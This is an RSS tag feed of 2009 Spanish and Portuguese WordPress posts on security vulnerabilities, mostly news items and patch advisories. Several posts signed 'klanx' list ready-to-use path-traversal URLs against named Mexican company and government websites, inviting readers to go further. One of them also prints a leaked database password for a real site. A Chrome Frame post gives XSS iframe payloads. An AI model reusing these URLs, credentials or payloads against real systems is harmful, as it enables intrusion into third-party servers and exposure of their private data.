<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>vulnerabilidades &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://en.wordpress.com/tag/vulnerabilidades/</link>
	<description>Feed of posts on WordPress.com tagged "vulnerabilidades"</description>
	<pubDate>Mon, 28 Dec 2009 03:18:10 +0000</pubDate>

	<generator>http://en.wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[Arbitrary download - www.anhelodiseno.com.mx]]></title>
<link>http://dscleon.wordpress.com/2009/12/05/arbitrary-download-www-anhelodiseno-com-mx/</link>
<pubDate>Sat, 05 Dec 2009 19:43:12 +0000</pubDate>
<dc:creator>nmartinez2</dc:creator>
<guid>http://dscleon.wordpress.com/2009/12/05/arbitrary-download-www-anhelodiseno-com-mx/</guid>
<description><![CDATA[Pagina: http://www.anhelodiseno.com.mx/ Vulnerabilidad: Arbitrary Downloader. Archivo vulnerable: de]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Pagina: http://www.anhelodiseno.com.mx/<br />
Vulnerabilidad: Arbitrary Downloader.<br />
Archivo vulnerable: descargas.php<br />
Explotando: http://www.anhelodiseno.com.mx/hubbell/descargas.php?pdf=../mysql.php</p>
<p><code><br />
</code></p>
<p><code> /* variables de conexión */<br />
        var $BaseDatos;<br />
        var $Servidor;<br />
        var $Usuario;<br />
        var $Clave;</p>
<p>        /* identificador de conexión y consulta */<br />
        var $Conexion_ID = 0;<br />
        var $Consulta_ID = 0;</p>
<p>        /* número de error y texto error */<br />
        var $Errno = 0;<br />
        var $Error = "";</p>
<p>        /* Método Constructor: Cada vez que creemos una variable<br />
        de esta clase, se ejecutará esta función */<br />
        function DB_mysql($bd = "anhelo01_hubbell", $host = "localhost", $user = "anhelo01_hubbell", $pass = "hubbell4517") {<br />
        $this-&#62;BaseDatos = $bd;<br />
        $this-&#62;Servidor = $host;<br />
        $this-&#62;Usuario = $user;<br />
        $this-&#62;Clave = $pass;<br />
                }<br />
</code></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alakrana: lecciones aprendidas]]></title>
<link>http://carmelomolina.wordpress.com/2009/11/22/alakrana-lecciones-aprendidas/</link>
<pubDate>Sun, 22 Nov 2009 16:29:23 +0000</pubDate>
<dc:creator>Carmelo Molina</dc:creator>
<guid>http://carmelomolina.wordpress.com/2009/11/22/alakrana-lecciones-aprendidas/</guid>
<description><![CDATA[ASUNTO Comentario al artículo &#8220;Alakrana: lecciones aprendidas&#8220;, del Almirante Ángel Tafa]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><h3><span style="color:#ff6600;">ASUNTO</span></h3>
<p style="padding-left:30px;">Comentario al artículo &#8220;<em>Alakrana: lecciones aprendidas</em>&#8220;, del Almirante <strong>Ángel Tafalla Balduz</strong>, publicado en la <a title="Alakrana: lecciones aprendidas" href="http://www.revistatenea.es/RevistaAtenea/REVISTA/articulos/GestionNoticias_1215_ESP.asp" target="_blank">Revista Atenea</a> con fecha viernes, 20 NOV 09.</p>
<h3><span style="color:#ff6600;">COMENTARIO</span></h3>
<p style="text-align:justify;">1.- ¿Tenemos la capacidad de desplegar dos fragatas de la clase F-100 en el Océano Índico? Sí.</p>
<p>2.- ¿Tenemos unas capacidades C4ISR adecuadas para el final de la primera década del S. XXI? Sí.</p>
<p>3.- ¿Tenemos la capacidad de realizar operaciones especiales en ambiente hostil y empleando toda suerte de medios? Sí.</p>
<p>Evidentemente, conocemos cuál es nuestro listado exhaustivo de CAPACIDADES. Sin embargo, la cuestión clave complementaria sería el consabido:</p>
<p>¿Tenemos la INTENCIÓN de emplear todas esas capacidades militares contra los piratas? ¡No!</p>
<p>Y este &#8220;NO&#8221; de nuestras intenciones continuará influyendo no sólo sobre nuestras capacidades, sino también sobre nuestros probables cursos de acción en el marco de la operación ATALANTA.</p>
<p>Como muy bien deja entrever el Almirante Tafalla en el último párrafo de su artículo —y ciñéndonos exclusivamente al ámbito militar—, el secuestro del Alakrana ha dejado al descubierto algunas vulnerabilidades INTEL de las F-100 en particular y, por extrapolación, del CIFAS en general. Por citar algunas:</p>
<p>a) ¿Tienen las F-100 la capacidad de obtención HUMINT en el nivel táctico-operacional? No.</p>
<p>b) ¿Tienen las F-100 la capacidad de realizar operaciones de Información (INFO OPS) o sicológicas (PSYOPS) sobre el “enemigo” en los niveles táctico y operacional? No.</p>
<p>c) ¿Tienen las F-100 la capacidad de Contrainteligencia (CI) necesaria contra los medios ISTAR (sic!) del “adversario” y sus actividades TESSOC (terrorismo, espionaje, subversión, sabotaje y crimen organizado)? No.</p>
<p>En este sentido, coincido con el Almirante en que una de las principales lecciones aprendidas en el plano militar hace referencia precisamente a esos “fallos de Inteligencia&#8221;. Sin duda, hay que reforzar con más medios humanos y materiales todos los nodos de Inteligencia: comenzado por el nodo principal (CIFAS), y descendiendo hasta los nodos de captación de las F-100. Otra vulnerabilidad añadida la constituye su interrelación con los nodos secundarios (CMOPS) y los de “consulta” (CNI). Como es sabido, CIFAS y CNI no “comprehenden” del mismo modo sus zonas de responsabilidad de inteligencia (ZRI).</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[{Vulnerabilidade} Vazamento de dados leva Visa e MasterCard a alertar bancos na Europa.]]></title>
<link>http://itversa.wordpress.com/2009/11/21/vulnerabilidade-vazamento-de-dados-leva-visa-e-mastercard-a-alertar-bancos-na-europa/</link>
<pubDate>Sat, 21 Nov 2009 06:03:50 +0000</pubDate>
<dc:creator>Erasmo Guimarães - ERGJ</dc:creator>
<guid>http://itversa.wordpress.com/2009/11/21/vulnerabilidade-vazamento-de-dados-leva-visa-e-mastercard-a-alertar-bancos-na-europa/</guid>
<description><![CDATA[Problema afeta quem teve transações processadas na Espanha; bancos de quatro países já decidiram tro]]></description>
<content:encoded><![CDATA[Problema afeta quem teve transações processadas na Espanha; bancos de quatro países já decidiram tro]]></content:encoded>
</item>
<item>
<title><![CDATA[{Vulnerabilidade} Perito quebra sigilo e descobre voto de eleitores em urna eletrônica do Brasil]]></title>
<link>http://itversa.wordpress.com/2009/11/21/vulnerabilidade-perito-quebra-sigilo-e-descobre-voto-de-eleitores-em-urna-eletronica-do-brasil/</link>
<pubDate>Sat, 21 Nov 2009 05:37:59 +0000</pubDate>
<dc:creator>Erasmo Guimarães - ERGJ</dc:creator>
<guid>http://itversa.wordpress.com/2009/11/21/vulnerabilidade-perito-quebra-sigilo-e-descobre-voto-de-eleitores-em-urna-eletronica-do-brasil/</guid>
<description><![CDATA[Especialista ganha prêmio do TSE por registrar interferência da urna sobre rádio, o que permitiria r]]></description>
<content:encoded><![CDATA[Especialista ganha prêmio do TSE por registrar interferência da urna sobre rádio, o que permitiria r]]></content:encoded>
</item>
<item>
<title><![CDATA[BACKTRAIZANDO]]></title>
<link>http://barceludena.wordpress.com/2009/11/20/backtraizando/</link>
<pubDate>Fri, 20 Nov 2009 23:03:17 +0000</pubDate>
<dc:creator>barceludena</dc:creator>
<guid>http://barceludena.wordpress.com/2009/11/20/backtraizando/</guid>
<description><![CDATA[Herramientas: HP Pavilion dv5-1235la Entertainment PC (la mayorìa sirve) + Ubuntu Karmic + acceso a ]]></description>
<content:encoded><![CDATA[Herramientas: HP Pavilion dv5-1235la Entertainment PC (la mayorìa sirve) + Ubuntu Karmic + acceso a ]]></content:encoded>
</item>
<item>
<title><![CDATA[PHP: múltiples vulnerabilidades]]></title>
<link>http://hackingetico.wordpress.com/2009/11/20/php-multiples-vulnerabilidades/</link>
<pubDate>Fri, 20 Nov 2009 19:49:57 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/20/php-multiples-vulnerabilidades/</guid>
<description><![CDATA[Múltiples vulnerabilidades han sido reportadas en PHP, algunos de los cuales tienen un impacto desco]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><img class="aligncenter" title="PHP" src="http://plagatux.es/wp-content/uploads/2008/04/w248h220_php-logo.jpg" alt="" width="248" height="144" /></p>
<p>Múltiples vulnerabilidades han sido reportadas en PHP, algunos de los cuales tienen un impacto desconocido y otras que pueden ser explotadas por usuarios maliciosos para eludir ciertas restricciones de seguridad. A continuación se detallan las vulnerabilidades detectadas.</p>
<p>1) Errores de validación de entrada existentes en el tratamiento de los datos EXIF.</p>
<p>2) Un error en &#8220;tempnam ()&#8221; puede ser explotado para eludir la característica &#8221;safe_mode&#8221;.</p>
<p>3) Un error en &#8220;posix_mkfifo ()&#8221; puede ser aprovechado para eludir la característica &#8220;open_basedir&#8221;.</p>
<p>SOLUCIÓN: Actualizar a la versión 5.3.1.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Chrome Frame null domain XSS]]></title>
<link>http://climbo.wordpress.com/2009/11/20/google-chrome-frame-null-domain-xss/</link>
<pubDate>Fri, 20 Nov 2009 18:10:11 +0000</pubDate>
<dc:creator>climbo</dc:creator>
<guid>http://climbo.wordpress.com/2009/11/20/google-chrome-frame-null-domain-xss/</guid>
<description><![CDATA[##################################### Google Chrome Frame null domain XSS URL afectada: http://www.g]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>#####################################<br />
<strong>Google Chrome Frame null domain XSS</strong><br />
URL afectada: <strong>http://www.google.com/chromeframe</strong><br />
Changelog del vendedor: http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html<br />
Reportado por: http://lostmon.blogspot.com/2009/11/google-chrome-frame-null-domain-xss.html<br />
Notificación al vendedor: <span style="color:#ff0000;"><strong>SÍ</strong></span> Exploit disponible: <span style="color:#ff0000;"><strong>SÍ</strong></span><br />
######################################</p>
<p>######################<br />
<strong>Descripción del vendedor</strong><br />
######################</p>
<p>Google Chrome Frame es un plug-in gratuito para Internet Explorer. Algunas aplicaciones web avanzadas, como Google Wave, contiene el uso de Google Chrome Frame para ofrecerle características adicionales y un mejor rendimiento.</p>
<p>Google Chrome Frame es una etapa inicial de código abierto, un plug-in que hace a la perfección Google Chrome mejorando las tecnologías web y el motor de JavaScript de Internet Explorer.</p>
<p>################<br />
<strong>Versiones afectadas</strong><br />
################</p>
<p>4.0.223.9 (Official Build 29618)<br />
WebKit: 532.3<br />
V8: 1.3.16<br />
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)<br />
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3</p>
<p>Versiones no afectadas:</p>
<p>4.0.245.1 (Official Build 31970)<br />
WebKit: 532.5<br />
V8: 1.3.18.6<br />
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)<br />
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5</p>
<p>Para más información visiten:</p>
<p>http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html</p>
<p>#####################<br />
<strong>Cross Site Scripting</strong><br />
#####################</p>
<p>Creamos un documento HTML para probar y metemos =&#62;</p>
<p>&#60;iframe src=&#8221;javascript:alert(1)&#62;&#60;/iframe&#62;</p>
<p>=&#62; se abre el iframe y ejecuta el alert (esto es lo correcto)</p>
<p>&#60;iframe src=&#8221;cf:javascript:alert(1)&#62;&#60;/iframe&#62;</p>
<p>=&#62; esto no funciona, no muestra el alert (sigue siendo correcto)</p>
<p>Y aquí está el error:</p>
<p>&#60;iframe src=&#8221;cf:view-source:javascript:alert(1)&#62;&#60;/iframe&#62;</p>
<p>Este code ejecuta y muestra el alert que funciona en local y a su vez en remoto o también a través de la barra de dirección.</p>
<p>Esto pasa las políticas de origen de datos !!</p>
<p>Para probar el navegador Google Chrome ponemos en la barra de dirección =&#62;</p>
<p>view-source:javascript:alert(1)</p>
<p>Esto ejecuta el alert, aun así Google hace poco decidió realizar unos cambios en él como poner la página en blanco, este tema es sólo explotable a través de la barra de direcciones, no en un iframe o frame o documento html, así que por ese motivo creo que este problema no es explotable remotamente.</p>
<p>###########<br />
<strong>Crashes</strong><br />
###########</p>
<p>cf:view-source:about@: =&#62; se rompe<br />
cf:about@: =&#62; rompe el tab</p>
<p>##########<br />
<strong>Solución</strong><br />
############</p>
<p>Google automáticamente ha sacado una nueva versión de Chrome Frame 4.0.245.1 (Official Build 31970) y esta versión no está afectada por esta vulnerabilidad.</p>
<p>#################€nd#############<br />
<!--more--><br />
Thnx to estrella To be mi ligth<br />
Thnx To icar0 &#38; sha0 from Badchecksum<br />
Thnx To Google security Team</p>
<p>atentamente:<br />
Security Research &#38; Analisys.<br />
Lostmon (lostmon@gmail.com)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>thz <strong>Lost</strong> <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Los smartphones en redes Wi-Fi son muy vulnerables a ataques de seguridad]]></title>
<link>http://hackingetico.wordpress.com/2009/11/20/los-smartphones-en-redes-wi-fi-son-muy-vulnerables-a-ataques-de-seguridad/</link>
<pubDate>Fri, 20 Nov 2009 12:16:56 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/20/los-smartphones-en-redes-wi-fi-son-muy-vulnerables-a-ataques-de-seguridad/</guid>
<description><![CDATA[Un nuevo informe realizado por un fabricante de seguridad para móviles detalla cómo los smartphones ]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><img class="aligncenter" title="Smartphone" src="http://www.ubergizmo.com/photos/2007/8/lg-wm6-smartphone-rumor.jpg" alt="" width="118" height="162" /></p>
<p>Un nuevo informe realizado por un fabricante de seguridad para móviles detalla cómo los smartphones más populares, como el iPhone, son muy vulnerables cuando están conectados a redes Wi-Fi públicas.</p>
<p>El estudio ha sido realizado por <strong>SMobile Systems</strong> y afirma que los usuarios de este tipo de teléfonos de última generación que se conectan a hotspots Wi-Fi sin encriptar  pueden verse fácilmente atacados  utilizando herramientas conocidas por todos. Los autores del estudio emplearon estas herramientas para <strong>interceptar combinaciones de nombre de usuario y contraseñas</strong> enviadas desde diferentes teléfonos inteligentes.</p>
<p><!--more-->Para realizar estas pruebas, utilizaron un portátil con herramientas de <strong>software que permiten interceptar comunicaciones entre smartphones</strong> que se conecten a un punto de acceso Wi-Fi. Esa información fue posteriormente utilizada para acceder a toda una variedad de cuentas de correo electrónico. La misma información podría ser utilizada para acceder a una cuenta bancaria on-line o a cualquier otro dato.</p>
<p>Smobile probó diferentes dispositivos, como el Nokia N95, HTC Tilt con Windows Mobile, HTC G1 con Android y el iPhone 3GS con el último firmware. En cada caso, el usuario no tenía ni idea de que sus datos estaban comprometidos.</p>
<p>“Utilizando este método, el atacante indicaría al dispositivo de la víctima cómo dirigir todo el tráfico a través de la máquina del atacante que luego pediría estos datos al hotspot Wi-Fi”. El equipo atacante <strong>capturaría todo el tráfico y podría modificar o acabar con conexiones activas</strong>. Una vez superado el control SSL, tan pronto como la víctima accede a su correo electrónico o a otra cuenta, las credenciales de acceso aparecerán como texto simple en el equipo del atacante.</p>
<p>Los autores del estudio han avisado a los usuarios de smartphones  para que “busquen e identifiquen aplicaciones que les proporcionen tecnologías de encriptación adecuadas para proteger información confidencial o privada”. Existen aplicaciones para realizar esas tareas, aunque aún no son muchas. El objetivo será <strong>conseguir encriptación end-to-end</strong> entre la aplicación del cliente y el servidor objetivo. Sin esa protección, los usuarios deberán estar atentos y saber que su información podrá ser visible para cualquier atacante.</p>
<p>Para las empresas es fundamental tratar a los smartphones con capacidades de conexión Wi-Fi como si se tratara de portátiles corporativos. Es decir, que cuenten con software de seguridad, firewall y antivirus.</p>
<p>Fuente: idg</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerabilidad en Kaspersky Antivirus 2010]]></title>
<link>http://hackingetico.wordpress.com/2009/11/19/vulnerabilidad-en-kaspersky-antivirus-2010/</link>
<pubDate>Thu, 19 Nov 2009 09:54:16 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/19/vulnerabilidad-en-kaspersky-antivirus-2010/</guid>
<description><![CDATA[Si eres usuario de Kaspersky Antivirus 2010 te interesará saber que se ha descubierto una vulnerabil]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Si eres usuario de Kaspersky Antivirus 2010 te interesará saber que se ha descubierto una vulnerabilidad en Kaspersky Anti-Virus 2010, que puede ser explotada por usuarios locales maliciosos para provocar un DoS (Denial of Service).</p>
<p>La vulnerabilidad se debe a un error en el controlador kl1.sys al manipular IOCTL. Esto puede ser explotado para eliminar la referencia de memoria no válida y causar un &#8220;crash&#8221; a través de un núcleo especialmente diseñado 0&#215;0022C008IOCTL.</p>
<p>La vulnerabilidad está confirmada en la versión 9.0.0.463. Otras versiones también pueden verse afectadas.</p>
<p>SOLUCIÓN: Actualizar a la versión 9.0.0.736.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerabilidad FSD Congreso de Hidalgo]]></title>
<link>http://dscleon.wordpress.com/2009/11/18/vulnerabilidad-fsd-congreso-de-hidalgo/</link>
<pubDate>Wed, 18 Nov 2009 14:04:19 +0000</pubDate>
<dc:creator>nmartinez2</dc:creator>
<guid>http://dscleon.wordpress.com/2009/11/18/vulnerabilidad-fsd-congreso-de-hidalgo/</guid>
<description><![CDATA[La pagina vulnerable: www.congreso-hidalgo.gob.mx/ Vulnerabilidad: Bajar.php?id= Metodo: Full Source]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>La pagina vulnerable: www.congreso-hidalgo.gob.mx/<br />
Vulnerabilidad: Bajar.php?id=<br />
Metodo: Full Source Discloure / Arbitrary Downloader.</p>
<p>Explotando:<br />
www.congreso-hidalgo.gob.mx/Bajar.php?id=../index.php</p>
<p>www.congreso-hidalgo.gob.mx/Bajar.php?id=../Bajar.php</p>
<p>www.congreso-hidalgo.gob.mx/Bajar.php?id=../config/phpwcms/conf.inc.php</p>
<p>www.congreso-hidalgo.gob.mx/Bajar.php?id=../include/inc_lib/default.inc.php</p>
<p>www.congreso-hidalgo.gob.mx/Bajar.php?id=../include/inc_lib/dbcon.inc.php</p>
<p>Happy UnderHacking</p>
<p>/klanx</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A Primeira a gente nunca esquece]]></title>
<link>http://safepractices.wordpress.com/2009/11/18/a-primeira-a-gente-nunca-esquece/</link>
<pubDate>Wed, 18 Nov 2009 12:27:10 +0000</pubDate>
<dc:creator>Ygor Moretti</dc:creator>
<guid>http://safepractices.wordpress.com/2009/11/18/a-primeira-a-gente-nunca-esquece/</guid>
<description><![CDATA[&#160;&#160;&#160;&#160; Nessa última sexta-feira 13 (data sugestiva), foi divulgado pela&#160; Micr]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><a href="http://safepractices.files.wordpress.com/2009/11/windows7.jpg"><img style="margin:15px 0 10px 10px;" title="windows7" border="0" alt="windows7" align="right" src="http://safepractices.files.wordpress.com/2009/11/windows7_thumb.jpg?w=165&#038;h=165" width="165" height="165" /></a>
<p align="justify">&#160;&#160;&#160;&#160; Nessa última sexta-feira 13 (data sugestiva), foi divulgado pela&#160; Microsoft uma nova vulnerabilidade em seu novo sistema operacional Winodows 7, sendo a mesma classificada como uma falha de <strong>zero-day*</strong>, este bug encontra-se no <strong>Server Message Block (SMB)**</strong>, um protocolo criado pela empresa que forma o backbone de compartilhamento de arquivos do Windows. O erro só pode ser explorado para congelar o computador, não permitindo a instalação de nenhum código malicioso. </p>
<p align="justify">&#160;&#160;&#160;&#160; Para se defender dessa vulnerabilidade basta bloquear as portas TCP 135 até 139. Já bloquear a porta 445 irá prevenir que tráfegos SMB externos entrem em sua rede.</p>
<p align="justify">&#160;&#160;&#160;&#160; Com o firewall bloqueado, a ameaça ainda persiste dentro do seu sistema, mas os sistemas internos da rede devem ser mais confiáveis do que aqueles encontrados na internet. Você também pode bloquear as portas da rede interna, mas você pode ficar impossibilitado de acessar arquivos e pastas localizados nessa área.</p>
<p align="justify">&#160;&#160;&#160;&#160; Com essas configurações básicas já dá para se ter uma segurança maior até que a próxima vulnerabilidade seja divulgada. Vale lembrar não existe sistema 100% seguro.</p>
<blockquote><p align="justify"><em><b>&#160;&#160;&#160;&#160; *Server Message Block</b> (<b>SMB</b>) trabalha como um protocolo de rede da camada de aplicação e tem como objetivo principal prover acesso compartilhado a arquivos, impressoras, portas seriais e outras comunicações entre nós (equipamentos) na rede. Ele também provê um mecanisco de comunicação entre processos de forma autenticada. Em grande parte seu uso se dá por computadores rodando sistemas operacionais Microsoft Windows.</em></p>
<p align="justify"><em>&#160;&#160;&#160;&#160; <strong>**</strong>Um ataque <b>zero-day</b> (ou <b>zero-hour</b>)&#160; é uma ameaça de computador que tenta explorar alguma vulnerabilidade em aplicações de computador<strong>&#160;</strong>que ainda não são de conhecimento do público, nem mesmo dos fabricantes das aplicações, ou ameaças que ainda não tenham correções disponíveis. Os ataques <strong>zero-day</strong> são usados ou compartilhados pelos hackers (ofensores) antes que os fabricantes das aplicações saibam das vulnerabilidades encontradas nelas.</em></p>
</blockquote>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerabilidad en Secretaria de Administracion y Finanzas de Tabasco.]]></title>
<link>http://dscleon.wordpress.com/2009/11/17/vulnerabilidad-en-secretaria-de-administracion-y-finanzas-de-tabasco/</link>
<pubDate>Tue, 17 Nov 2009 20:47:38 +0000</pubDate>
<dc:creator>nmartinez2</dc:creator>
<guid>http://dscleon.wordpress.com/2009/11/17/vulnerabilidad-en-secretaria-de-administracion-y-finanzas-de-tabasco/</guid>
<description><![CDATA[Empezando la tarde con un buen post, al visitar la pagina de tunich me gusto la forma de postear las]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Empezando la tarde con un buen post, al visitar la pagina de tunich me gusto la forma de postear las vulnerabilidades de paginas de interes social. Aqui ayudando a esa idea posteo esta vulnerabilidad.</p>
<p><strong>La pagina vulnerable:</strong> administracion.saf.tabasco.gob.mx<br />
<strong>Vulnerabilidad:</strong> /scripts/descarga.php?ruta=<br />
<strong>Metodo:</strong> Full Path Discloure</p>
<p><strong>Explotando:</strong><br />
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/../../Connections/db_source.php<br />
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/../../Connections/db_conection.php<br />
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/index.php</p>
<p>Ahi se las dejo, es cuestion de la imaginacion.<br />
Como dirian por ahi&#8230; Happy hacking.</p>
<p>/klanx</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[{Cyber Crime} Hackers invadiram site, diz ONS.]]></title>
<link>http://itversa.wordpress.com/2009/11/16/cyber-crime-hackers-invadiram-site-diz-ons/</link>
<pubDate>Mon, 16 Nov 2009 20:23:10 +0000</pubDate>
<dc:creator>Erasmo Guimarães - ERGJ</dc:creator>
<guid>http://itversa.wordpress.com/2009/11/16/cyber-crime-hackers-invadiram-site-diz-ons/</guid>
<description><![CDATA[Ataque aconteceu na rede corporativa, na quinta-feira (12). Sistema operativo é blindado, segundo ór]]></description>
<content:encoded><![CDATA[Ataque aconteceu na rede corporativa, na quinta-feira (12). Sistema operativo é blindado, segundo ór]]></content:encoded>
</item>
<item>
<title><![CDATA[{Vulnerabilidades} Aplicativos web 9 em 10 têm falhas sérias.]]></title>
<link>http://itversa.wordpress.com/2009/11/16/vulnerabilidades-aplicativos-web-9-em-10-tem-falhas-serias/</link>
<pubDate>Mon, 16 Nov 2009 19:51:03 +0000</pubDate>
<dc:creator>Erasmo Guimarães - ERGJ</dc:creator>
<guid>http://itversa.wordpress.com/2009/11/16/vulnerabilidades-aplicativos-web-9-em-10-tem-falhas-serias/</guid>
<description><![CDATA[Dez vulnerabilidades mais severas verificadas no primeiro semestre de 2009 afetaram softwares da Apa]]></description>
<content:encoded><![CDATA[Dez vulnerabilidades mais severas verificadas no primeiro semestre de 2009 afetaram softwares da Apa]]></content:encoded>
</item>
<item>
<title><![CDATA[{BUG} Microsoft corrige 15 falhas, incluindo bug crítico malicioso.]]></title>
<link>http://itversa.wordpress.com/2009/11/15/bug-microsoft-corrige-15-falhas-incluindo-bug-critico-malicioso/</link>
<pubDate>Mon, 16 Nov 2009 00:09:00 +0000</pubDate>
<dc:creator>Erasmo Guimarães - ERGJ</dc:creator>
<guid>http://itversa.wordpress.com/2009/11/15/bug-microsoft-corrige-15-falhas-incluindo-bug-critico-malicioso/</guid>
<description><![CDATA[Por Computerworld (EUA) Publicada em 10 de novembro de 2009 às 21h18 Atualizada em 10 de novembro de]]></description>
<content:encoded><![CDATA[Por Computerworld (EUA) Publicada em 10 de novembro de 2009 às 21h18 Atualizada em 10 de novembro de]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Excel: múltiples vulnerabilidades]]></title>
<link>http://hackingetico.wordpress.com/2009/11/12/microsoft-excel-multiples-vulnerabilidades/</link>
<pubDate>Thu, 12 Nov 2009 09:07:28 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/12/microsoft-excel-multiples-vulnerabilidades/</guid>
<description><![CDATA[Como sabéis recientemente Microsoft ha publicado su boletín de seguridad de este mes de Noviembre, c]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Como sabéis recientemente Microsoft ha publicado su boletín de seguridad de este mes de Noviembre, con menos actualizaciones a realizar si la comparamos con la del mes de Octubre. De lo que más me ha sorprendido este boletín es de la multitud de vulnerabilidades descubiertas en Microsoft Excel, y que como usuario la verdad es que me preocupaban (hablo en pasado porque ayer actualicé mi Windows). A continuación os dejo una relación de las vulnerabilidades detectadas y su posible explotación.</p>
<div id="result_box" dir="ltr">1) Un error no especificado en el análisis de hojas de cálculo Excel puede ser explotado para corromper la memoria a través de un archivo de Excel especialmente diseñado.</div>
<div dir="ltr"><!--more--></div>
<div dir="ltr">2) Un error no especificado en la tramitación de registro de objeto de exploración puede ser explotado para corromper la memoria a través de un archivo de Excel especialmente diseñado.</div>
<div dir="ltr">3) Otro error no especificado en el tratamiento de determinadas OBJETOS registro puede ser explotado para corromper la memoria a través de un archivo de Excel especialmente diseñado.</div>
<div dir="ltr">En este enlace podéis ver más información. Por último decir que afecta prácticamente a todas las versiones de Excel, incluso la versión 2007. Para los MACkeros decir que también afecta a sus versiones.</div>
<div dir="ltr">Lo dicho, ¡¡¡ a actualizar!!!</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Cyber Crimes] Hackers exploram brecha e sequestram centenas de grupos no Facebook.]]></title>
<link>http://itversa.wordpress.com/2009/11/11/cyber-crimes-hackers-exploram-brecha-e-sequestram-centenas-de-grupos-no-facebook/</link>
<pubDate>Wed, 11 Nov 2009 17:47:12 +0000</pubDate>
<dc:creator>Erasmo Guimarães - ERGJ</dc:creator>
<guid>http://itversa.wordpress.com/2009/11/11/cyber-crimes-hackers-exploram-brecha-e-sequestram-centenas-de-grupos-no-facebook/</guid>
<description><![CDATA[Por Computerworld (EUA) Publicada em 10 de novembro de 2009 às 19h20 Atualizada em 10 de novembro de]]></description>
<content:encoded><![CDATA[Por Computerworld (EUA) Publicada em 10 de novembro de 2009 às 19h20 Atualizada em 10 de novembro de]]></content:encoded>
</item>
<item>
<title><![CDATA[[ISO 25999] O Brasil tem plano de Continuidade de Negócios?]]></title>
<link>http://itversa.wordpress.com/2009/11/11/iso-25999-o-brasil-tem-plano-de-continuidade-de-negocios/</link>
<pubDate>Wed, 11 Nov 2009 16:51:45 +0000</pubDate>
<dc:creator>Erasmo Guimarães - ERGJ</dc:creator>
<guid>http://itversa.wordpress.com/2009/11/11/iso-25999-o-brasil-tem-plano-de-continuidade-de-negocios/</guid>
<description><![CDATA[O que faz o BRASIL, brasil? Ainda temos muito a fazer em relação a tudo o que vem acontecendo no Bra]]></description>
<content:encoded><![CDATA[O que faz o BRASIL, brasil? Ainda temos muito a fazer em relação a tudo o que vem acontecendo no Bra]]></content:encoded>
</item>
<item>
<title><![CDATA[Nuevo fallo en el protocolo SSL]]></title>
<link>http://hackingetico.wordpress.com/2009/11/10/nuevo-fallo-en-el-protocolo-ssl/</link>
<pubDate>Mon, 09 Nov 2009 22:30:32 +0000</pubDate>
<dc:creator>hackingetico</dc:creator>
<guid>http://hackingetico.wordpress.com/2009/11/10/nuevo-fallo-en-el-protocolo-ssl/</guid>
<description><![CDATA[El fallo se presenta como un estándar SSL en sí mismo, lo que significa que todos los sistemas que u]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>El fallo se presenta como un estándar SSL en sí mismo, lo que significa que todos los sistemas que utilicen el protocolo podrían ser vulnerables a los ataques.</p>
<p>Un nuevo fallo en el protocolo SSL (Secure Socket Layer) pone a empresas de telecomunicaciones y vendedores de seguridad en la picota.</p>
<p>El vendedor de seguridad móvil PhoneFactor ha dicho que la vulnerabilidad se ha descubierto en la transmisión de los datos a través de conexiones SSL. El fallo podría, potencialmente, permitir a un hacker ejecutar un ataque &#8216;man in the middle’, o de intermediario, en el que el atacante adquiere la capacidad de alterar la información enviada entre dos usuarios sin que ninguno de ellos lo sepa.</p>
<p><!--more--></p>
<p>Según PhoneFactor <strong>el fallo se presenta como un estándar SSL en sí mismo</strong>, lo que significa que todos los sistemas que utilicen el protocolo podrían ser vulnerables a los ataques.</p>
